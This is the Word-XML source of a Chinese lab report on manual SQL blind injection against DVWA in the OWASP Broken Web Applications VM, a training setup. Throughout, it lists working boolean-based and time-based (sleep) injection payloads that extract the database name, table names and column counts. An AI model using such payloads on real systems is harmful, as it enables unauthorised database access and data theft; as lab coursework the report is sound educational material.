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SQL盲注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基于DVWA里的SQL盲注案例，实施手工盲注，参考课本，撰写实验报告。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环境搭建：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本实验基于OWASP发布的开源虚拟镜像“OWASP Broken Web Applications VM”来进行SQL盲注。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将OWASP虚拟映像解压，用VMware加载该映像</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3832860" cy="175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459480" cy="220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290258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输入用户名“root”及密码“owaspbwa”可以登录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90652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得到IP地址为192.168.220.131，至此，owasp环境已经ok了。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保持虚拟机打来，接下来就可以用主机浏览器访问了。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主机浏览器访问上述IP地址</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5260975" cy="2694305"/>
            <wp:effectExtent l="0" t="0" r="1206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选择Damn Vulnerable Web Application，用户名“user”密码“user”以登录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4594860" cy="3497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414210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选择SQL Injection(Blind)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190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接下来就可以进行SQL盲注实验了。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基于布尔的SQL盲注：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注入点，页面只返回True和False两种类型页面，此时可以利用基于布尔的盲注。布尔盲注就是通过判断语句来猜解，如果判断条件正确则页面显示正常，否则报错，这样一轮一轮猜下去直到猜对，是挺麻烦但是相对简单的盲注方式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判断是否存在注入，注入是字符型还是数字型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（这里用“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>永真永假法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”）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即当与上一个永真的语句时，对原查询不会有影响，如果与上永假的语句，则会出错。若符合上述规则，则说明存在注入。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输入1，显示相应用户存在：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3329940" cy="13792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输入1' and 1=1 #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">  （</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>单引号为了闭合原来SQL语句中的第一个单引号，而后面的#为了闭合后面的单引号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运行后，显示存在：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2804160" cy="1432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输入1' and 1=2 #</w:t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运行后，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显示不存在：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2804160" cy="7162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所以，存在注入。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="C00000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由于输入的东西带单引号，所以是字符型。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 and 1=1  （Mysql对数值型字段输入的如果有非字符，有默认处理，只提取前面有效数字使用，所以，可以利用这一点来判断是否是数值型还是字符型的注入）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运行后，显示存在：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2705100" cy="13716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所以，存在字符型SQL盲注。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点击右下角View Source查看源代码，可以发现，未对id做任何处理，确实存在SQL盲注，且id确实是字符型。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63570"/>
            <wp:effectExtent l="0" t="0" r="6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猜解数据库名：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·先猜名的长度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输入1' and length(database())=1 #，显示不存在；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输入1' and length(database())=2 #，显示不存在；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输入1' and length(database())=3 #，显示不存在；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590800" cy="6934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输入1' and length(database())=4 #，显示存在：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628900" cy="134874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所以，数据库名的长度为4。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·逐个字符猜解数据库名（采用二分法，用“&lt;”、“&gt;”逐渐缩小每个字符的范围，直到确定下来）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输入1' and ascii(substr(database(),1,1))&gt;97 #，显示存在，说明数据库名的第一个字符的ascii值大于97（小写字母a的ascii值）；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28875" cy="1004570"/>
            <wp:effectExtent l="0" t="0" r="952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se(),1,1))&lt;122 #，显示存在，说明数据库名的第一个字符的ascii值小于122（小写字母z的ascii值）；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11095" cy="1044575"/>
            <wp:effectExtent l="0" t="0" r="1206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se(),1,1))&lt;109 #，显示存在，说明数据库名的第一个字符的ascii值小于109（小写字母m的ascii值）；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55240" cy="1098550"/>
            <wp:effectExtent l="0" t="0" r="508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se(),1,1))&lt;103 #，显示存在，说明数据库名的第一个字符的ascii值小于103（小写字母g的ascii值）；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02865" cy="1126490"/>
            <wp:effectExtent l="0" t="0" r="317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se(),1,1))&lt;100 #，显示不存在，说明数据库名的第一个字符的ascii值不小于100（小写字母d的ascii值）；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se(),1,1))&gt;100 #，显示不存在，说明数据库名的第一个字符的ascii值不大于100（小写字母d的ascii值）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0360" cy="72390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所以数据库名的第一个字符的ascii值为100，即小写字母d。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再猜后边的字符：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,1))&lt;1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> #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显示存在，说明数据库名的第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个字符的ascii值小于1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（小写字母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的ascii值）；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811780" cy="1152525"/>
            <wp:effectExtent l="0" t="0" r="762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,1))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17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> #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显示存在，说明数据库名的第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个字符的ascii值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>大</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>于1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（小写字母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的ascii值）；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863850" cy="1172845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,1))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 xml:space="preserve"> #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显示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存在，说明数据库名的第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个字符的ascii值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>不大</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>于1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>（小写字母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的ascii值）；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,1))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 xml:space="preserve"> #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显示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存在，说明数据库名的第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个字符的ascii值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>不小</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>于1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>（小写字母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的ascii值）；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9920" cy="7010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所以，第二个字符ascii值为118，即小写字符“v”。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,1))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19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> #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显示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存在，说明数据库名的第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个字符的ascii值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>不大</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>于1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（小写字母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的ascii值）；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1' and ascii(substr(datab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se(),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,1))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19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> #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显示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存在，说明数据库名的第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个字符的ascii值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>不小</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>于1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（小写字母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的ascii值）；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169920" cy="7010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所以，第三个字符为w。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输入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1' and ascii(substr(datab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se(),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4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,1))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97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#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，显示不存在，说明数据库名的第二个字符的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ascii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值不大于97（小写字母a的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ascii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值）；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输入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1' and ascii(substr(datab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se(),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4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,1))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&lt;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97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#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，显示不存在，说明数据库名的第二个字符的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ascii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值不小于97（小写字母a的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ascii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值）；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169920" cy="701040"/>
            <wp:effectExtent l="0" t="0" r="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所以，第四个字符为a。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所以，数据库名为“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>dvwa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”。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猜数据库中的表名：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·先猜表数量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hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>输入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1’and (select count(table_name) from information_schema.tables where table_schema = database())=1 #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显示不存在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13660" cy="716280"/>
            <wp:effectExtent l="0" t="0" r="762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hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>输入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1’and (select count(table_name) from information_schema.tables where table_schema = database())=2 #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显示存在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230" cy="1081405"/>
            <wp:effectExtent l="0" t="0" r="3810" b="63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所以，数据库中有两个表。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·挨个猜表名：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跟猜数据库名一样，先确定长度，再挨个通过二分法判断ascii码进而确定字符。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输入1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1 # 显示不存在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865120" cy="754380"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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输入1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9 # 显示存在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3675" cy="918845"/>
            <wp:effectExtent l="0" t="0" r="14605" b="1079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说明第一个表名长度为9。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二分法猜表名：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1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))&gt;97 # 显示存在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18845"/>
            <wp:effectExtent l="0" t="0" r="5080" b="1079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1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))&lt;122 # 显示存在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21385"/>
            <wp:effectExtent l="0" t="0" r="1270" b="825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1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))&lt;109 # 显示存在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951230"/>
            <wp:effectExtent l="0" t="0" r="5715" b="889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1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))&lt;103 # 显示不存在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1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))&gt;103 # 显示不存在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246120" cy="708660"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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所以，第一个表名的第一个字符为“g”。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按此方法，更改ascii(字符串，a，1)中的a参数，可以试出第2-9个字符，这里不过多赘述。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最终得到第一个表名为“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>guestbook</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”。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将substr函数的参数更改为“SQL-quary，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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>,1”即可对第二个表名进行操作，按照先猜长度，再逐个字符猜解表名的方法，得到第二个表名为“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”。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猜表中的字段名：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·猜字段数量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1’ and (select count(column_name) from information_schema.columns where table_name= ’users’)=8 # 显示存在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4310" cy="1173480"/>
            <wp:effectExtent l="0" t="0" r="13970" b="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说明表“users”有8个字段。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·挨个字段猜名（先猜字段名长度，再用二分法逐个字符猜解）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1’ and length(substr((select column_name from information_schema.columns where table_name= ’users’ limit 0,1),1))=7 # 显示存在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770" cy="925195"/>
            <wp:effectExtent l="0" t="0" r="1270" b="444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说明users表的第一个字段为7个字符长度。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再二分法，猜表名的每个字符，语句格式如下：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1’ and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ascii</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">(substr((select column_name from information_schema.columns where table_name= ’users’ limit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>,1),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>,1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;(&lt;)XXX（=XXX） </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>#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更改红色加粗的参数，是对不同的字段操作；更改蓝色加粗的参数是对同一个字段名的不同字符操作。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这里不过多演示，方法如上。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猜表中的数据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方法同上。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基于时间的SQL盲注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·首先是否存在注入以及类型：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输入1’and sleep(5) #，感觉到明显延迟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 and sleep(5) #，没有延迟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说明存在字符型的基于时间的盲注。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·猜数据库名的长度：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1’ and if(length(database())=1,sleep(5),1) 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没有延迟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1’ and if(length(database())=4,sleep(5),1) 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明显延迟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所以长度为4.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·二分法猜解数据库名：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1’ and if(ascii(substr(database(),1,1))&gt;97,sleep(5),1)# 明显延迟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1’ and if(ascii(substr(database(),1,1))&gt;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 xml:space="preserve">,sleep(5),1)# </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>没有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>延迟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1’ and if(ascii(substr(database(),1,1))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>&lt;100</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">,sleep(5),1)# </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>没有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>延迟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说明第一个字符ascii值为100，为小写“d”。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以此类推，猜解表、字段和数据。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（也就是将基于布尔的显示存在，改为有延迟；显示不存在，改为无延迟，因为布尔的有回显，时间的无回显，只能通过是否有延迟来判断）</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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通过SQL注入可以获取数据库中的数据表和数据等，有一些SQL注入可以将SQL执行的结果回显，这种情况下，可以直接通过回显的结果来显示想要查询的各类信息。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但是，实际情况中，具有回显的注入点非常罕见。在这种情况下就需要利用SQL盲注。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SQL盲注中，由于不能对结果直接回显，所以需要根据不同的输入得到不同的返回结果，进而判断推测想要的信息，如数据库名、表、字段等信息。（可能是页面内容的不同，也可以是响应时间不同，所以SQL盲注一般分为三类：基于布尔SQL盲注、基于时间的SQL盲注、基于报错的SQL盲注。）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手工盲注的过程，就像你与一个机器人聊天，这个机器人知道的很多，但只会回答“是”或者“不是”，因此你需要询问它这样的问题，例如“数据库名字的第一个字母是不是a啊？”，通过这种机械的询问，最终获得你想要的数据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基于布尔和基于时间的SQL盲注本质上是一样的，布尔的会直接告诉你是或者不是；而时间的可以通过停留的时间判断是或者不是。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常用函数：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Substr函数的用法：取得字符串中指定起始位置和长度的字符串，默认是从起始位置到结束的子串。语法为：substr( string, start_position, [ length ] )，比如substr('目标字符串',开始位置,长度)，再如substr('This is a test', 6, 2) 将返回 'is'。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If函数的用法：如果满足一个条件可以赋一个需要的值。语法：IF(expr1,expr2,expr3)，其中，expr1是判断条件，expr2和expr3是符合expr1的自定义的返回结果，expr1为真则返回expr2，否则返回expr3。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Sleep函数的用法：sleep(n)让语句停留n秒时间，然后返回0，如果执行被打断，返回1。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Ascii函数的用法：返回字符的ASCII码值。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164E37"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="B1164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7B7CCB"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="B87B7CCB"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="（%1）"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0"/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ZjI3MTZiYzdjMjBkZDc5MzA0NmIwODNhMjhh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CAB5C49"/>
    <w:rsid w:val="603911C4"/>
    <w:rsid w:val="6898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257</Words>
  <Characters>306</Characters>
  <Lines>1</Lines>
  <Paragraphs>1</Paragraphs>
  <TotalTime>3</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>331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矛盾体</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-06-12T15:18:36Z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5589873C489A494285F26CDDDD5DEBF0</vt:lpwstr>
  </property>
</Properties>
</file>